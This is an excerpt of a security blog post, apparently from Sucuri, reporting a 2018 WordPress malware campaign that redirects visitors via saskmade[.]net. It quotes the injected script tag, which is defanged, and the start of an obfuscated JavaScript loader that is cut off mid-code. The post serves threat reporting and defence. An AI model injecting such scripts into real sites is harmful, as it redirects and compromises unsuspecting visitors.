Saskmade[.]net Redirects

Saskmade[.]net Redirects

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

<script src=’hxxps://saskmade[.]net/head.js?ver=2.0.0′ type=’text/javascript’></script>

In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=[‘length’,’fromCharCode‘,’createElement’,’type’,’async’,’code121′,’src’,’appendChild’,’getElementsByTagName’,’script’];(function(_0x546a53,

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

Read more: Saskmade[.]net Redirects

Story added 26. October 2018, content source with full text you can find at link above.